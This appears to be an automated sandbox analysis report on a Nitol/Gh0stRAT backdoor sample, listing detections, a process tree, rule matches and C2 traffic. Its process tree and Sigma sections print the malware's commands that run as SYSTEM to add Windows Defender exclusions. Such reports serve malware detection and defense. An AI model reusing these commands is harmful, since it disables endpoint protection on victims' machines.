Edit tour

Windows Analysis Report
2976587-987347589.08.exe

Overview

General Information

Sample name:	2976587-987347589.08.exe
Analysis ID:	1588718
MD5:	3f0d4ac83e0bec29aebc666ff027a5d6
SHA1:	0e8432e8855e31eca680181b961852deaba74ee8
SHA256:	857bcee55a11cc0dd14006a38bd0ca0a8d7f88ea6018219b55ff797cddccea95
Tags:	backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Nitol

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Nitol

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list (Registry)

Creates an undocumented autostart registry key

Drops PE files to the document folder of the user

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for dropped file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the driver directory

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Sigma detected: Windows Defender Exclusions Added - Registry

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

2976587-987347589.08.exe (PID: 7616 cmdline: "C:\Users\user\Desktop\2976587-987347589.08.exe" MD5: 3F0D4AC83E0BEC29AEBC666FF027A5D6)

XY3LL0.exe (PID: 892 cmdline: C:\Users\user\Documents\XY3LL0.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

XY3LL0.exe (PID: 4456 cmdline: C:\Users\user\Documents\XY3LL0.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

cmd.exe (PID: 5272 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4240 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5112 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2960 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 6968 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6916 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7500 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4608 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 1912 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1692 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5676 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1556 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 1880 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2148 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2524 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 316 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

byHW9q.exe (PID: 7708 cmdline: "C:\Program Files (x86)\byHW9q\byHW9q.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cmd.exe (PID: 1280 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3964 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 4476 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7656 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 1420 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 2992 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2552 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 2876 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 3368 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

byHW9q.exe (PID: 1052 cmdline: "C:\Program Files (x86)\byHW9q\byHW9q.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

QmbK8U.exe (PID: 1848 cmdline: "C:\Program Files (x86)\x736Pg9\QmbK8U.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

byHW9q.exe (PID: 7036 cmdline: "C:\Program Files (x86)\byHW9q\byHW9q.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

QmbK8U.exe (PID: 7820 cmdline: "C:\Program Files (x86)\x736Pg9\QmbK8U.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

byHW9q.exe (PID: 5488 cmdline: "C:\Program Files (x86)\byHW9q\byHW9q.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: byHW9q.exe PID: 7708	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: byHW9q.exe PID: 7708	PlugXStrings	PlugX Identifying Strings	Seth Hardy	0x31f2f:$Dwork: d:\work 0xa2b7b:$Dwork: d:\work 0xe7f34:$Dwork: d:\work 0xcfe24:$Shell6: Shell6 0xd0c03:$Shell6: Shell6

Unpacked PEs

Source	Rule	Description	Author	Strings
42.2.byHW9q.exe.3b703e8.7.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
42.2.byHW9q.exe.3b703e8.7.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
42.2.byHW9q.exe.10000000.8.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
7.2.XY3LL0.exe.2890000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath
42.2.byHW9q.exe.33c0000.6.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x221dd:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x2225b:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\XY3LL0.exe, ParentImage: C:\Users\user\Documents\XY3LL0.exe, ParentProcessId: 4456, ParentProcessName: XY3LL0.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 5272, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Source: Process started

Author: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3964, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 4476, ProcessName: reg.exe

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 4476, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T04:45:15.425167+0100	2852901	1	Malware Command and Control Activity Detected	192.168.2.9	49987	8.217.47.169	8917	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files (x86)\byHW9q\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\x736Pg9\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\x736Pg9\tbcore3U.dll

ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: 2976587-987347589.08.exe

Virustotal: Detection: 16%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\byHW9q\tbcore3U.dll	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\x736Pg9\tbcore3U.dll	Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\byHW9q\byHW9q.exe

Unpacked PE file: 42.2.byHW9q.exe.2980000.3.unpack

Source: unknown	HTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.9:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.9:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.9:49985 version: TLS 1.2

Source:	Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2976587-987347589.08.exe
Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: XY3LL0.exe, 00000008.00000003.2222500406.0000000003FAE000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3239126887.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002A.00000002.3239456656.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000000.2666597561.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002B.00000000.2687304360.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002B.00000002.2695070595.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, QmbK8U.exe, 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, QmbK8U.exe, 0000002C.00000000.2694474917.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, byHW9q.exe, 0000002F.00000002.2713673998.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002F.00000000.2703249364.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, QmbK8U.exe, 00000030.00000002.3201537025.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, QmbK8U.exe, 00000030.00000000.3184324160.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, byHW9q.exe, 00000031.00000000.3187483012.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 00000031.00000002.3203863917.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe.8.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, XY3LL0.exe, 00000007.00000000.1996508363.0000000140014000.00000002.00000001.01000000.00000008.sdmp, XY3LL0.exe, 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmp, XY3LL0.exe, 00000008.00000000.2013520702.0000000140014000.00000002.00000001.01000000.00000008.sdmp

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents	Jump to behavior

Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: 7_2_00007FF8FDF9A1B8 FindFirstFileExW,

7_2_00007FF8FDF9A1B8

Source: C:\Users\user\Documents\XY3LL0.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	File opened: C:\Users\user	Jump to behavior

Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	7_2_000000014000DFFE
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	7_2_000000014000DDFF
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]	7_2_0000000140011270
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	7_2_000000014000DE96
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	7_2_000000014000DEFB
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	7_2_000000014000E178
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	7_2_000000014000DDD9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.9:49987 -> 8.217.47.169:8917

Source: global traffic

TCP traffic: 192.168.2.9:49987 -> 8.217.47.169:8917

Source: Joe Sandbox View

IP Address: 118.178.60.9 118.178.60.9

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
